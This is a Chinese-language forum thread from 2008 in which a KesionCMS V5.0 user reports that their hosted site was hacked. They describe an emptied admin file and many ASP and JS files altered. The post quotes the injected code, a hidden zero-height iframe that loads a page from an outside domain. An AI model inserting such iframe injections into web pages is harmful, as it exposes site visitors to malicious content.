账号通
    

账号  

密码  

1344

查看

3

回复
主题:汗!V5.0也遭木马攻击 [收藏主题] 转到:  
wsdx 当前离线

153

主题

0

广播

0

粉丝
添加关注
级别:一年级

用户积分:1692 分
登录次数:157 次
注册时间:2006/10/4
最后登录:2010/3/3
wsdx 发表于:2008/8/6 8:53:00   | 显示全部帖子 查看该作者主题 楼主 
做在线知识付费 选科汛云开店

本人用的是最新的V5.0版本,虚拟主机。

 

昨天后台登陆不上去,登陆后是一空白页。以为服务器的问题,今天起来一试还是这样。于是查看服务器里的文件,发现admin目录下的KS.WebFiles.asp大小有变化,下载后查看文件是空的。上传了一个原始文件后,后台能正常登陆了。

 

后发现许多文件的日期发生了变化,有点奇怪,一般的文件日期都是上传的日期怎么自动更新了呢,下载了一些看了一下,这才大吃一惊,反是ASP文件(甚至JS文件)最后都注入了一段代码: <iframE src="http://www.sOrsent.cn/ka.htm?mOr" widTh=100 name='3920' HeigHt=0></iframe>。明白了,我的站点又被黑了!

 

询问虚拟主机供应商(怀疑是服务器有漏洞),他们说他们的服务器没问题。但我安排的是 V5.0的全新版本,也没放其它程序,怎么又被黑了,真有点晕了。这么多文件被更改,怎么办呀,真惨!

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
wsdx 当前离线

153

主题

0

广播

0

粉丝
添加关注
级别:一年级

用户积分:1692 分
登录次数:157 次
注册时间:2006/10/4
最后登录:2010/3/3
wsdx 发表于:2008/8/6 9:54:00   | 显示全部帖子 查看该作者主题 沙发 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.87891秒 powered by KesionCMS 9.0